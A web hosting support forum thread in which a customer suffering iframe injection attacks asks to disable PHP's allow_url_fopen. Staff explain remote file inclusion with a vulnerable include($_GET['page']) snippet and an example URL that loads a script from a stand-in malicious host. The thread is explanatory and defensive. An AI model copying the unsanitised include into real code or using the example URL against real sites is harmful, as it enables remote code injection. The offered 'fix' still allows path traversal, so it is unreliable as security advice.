Viewing Thread:
"allow_url_fopen"

I have read in various articles that, when enabled, this poses code injection security risks.

Is it possible to disable this on my webspace (I see it is currently 'on')?

Neil

Many thanks for your quick response.

N.

As other users of our VIP service use this functionality (for things such as pulling in RSS feeds among other uses) we are unable to disable this functionality.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:

On a page somewhere:


<?php
.....
....
include($_GET['page']);
...
...
?>


This allows someone to include other remote content by dong something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject

A simple fix would be to move your content pages to their own folder and then modify the code to this:


<?php
.....
....
include('page_dir/'.$_GET['page']);
...
...
?>


Try the .htaccess rules you asked support about and that may clear up you problems although we can't really help if the rewrite rules cause problems.

@ Eccles

Any progress on disabling this yet?

N.

Agreed.

I do hope you can invoke some kind of disabling of this. I believe it would greatly help.

I look forward to hearing any progress.

N.

Neilj99 wrote:
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.

We don't allow customers to overide PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overidden on the same basis as the enable global vars option (another option which can allow security risks).

Many thanks.

...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?

N.

I will see whether we can have this feature disabled. It might inconvenience some customers who use it but they should be able to use cURL instead to achieve the same thing.

If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not the sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problem and that is why it's generally considered a good idea to disable it.

With respect to your knowledge, I'm not entirely convinced.

I direct you to this article

http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/

I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.

I believe if allow_url_fopen was disabled it would help me immensely.

I have read that I can include

allow_url_fopen=off

in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.

N.

Chill Winstaaaan :D It is not that much of an issue to you, it is actually a security feature for server owners to protect themselves against users, such as you using fopen to grab external web pages and using them for malicious purposes. Just do not use fopen to reference external URLs and you will be doing the same as having allow_url_fopen turned off.

I have read in various articles that, when enabled, this poses code injection security risks.

Is it possible to disable this on my webspace (I see it is currently 'on')?

Neil